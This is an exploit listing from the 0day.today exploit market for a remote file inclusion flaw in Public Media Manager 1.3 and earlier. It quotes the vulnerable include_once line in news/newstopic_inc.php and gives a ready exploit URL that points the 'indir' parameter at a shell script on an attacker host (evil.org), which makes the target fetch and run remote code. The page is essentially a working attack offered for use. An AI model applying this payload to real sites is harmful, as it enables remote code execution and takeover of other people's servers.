[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Public Media Manager <= 1.3 Remote File Inclusion Vulnerability

Author
0in
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2177
Category
web applications
Date add
27-09-2007
Platform
unsorted
===============================================================
Public Media Manager <= 1.3 Remote File Inclusion Vulnerability
===============================================================



#f0und bY 0in
#Download:http://pmm-cms.sourceforge.net/
BUG:
news/newstopic_inc.php:2:if (!empty($indir)) include_once ($indir)."/newsdb/config.php";

Expl0it:
http://x.com/[path]/news/newstopic_inc.php?indir=http://evil.org/shell.txt



#  0day.today [2024-12-26]  #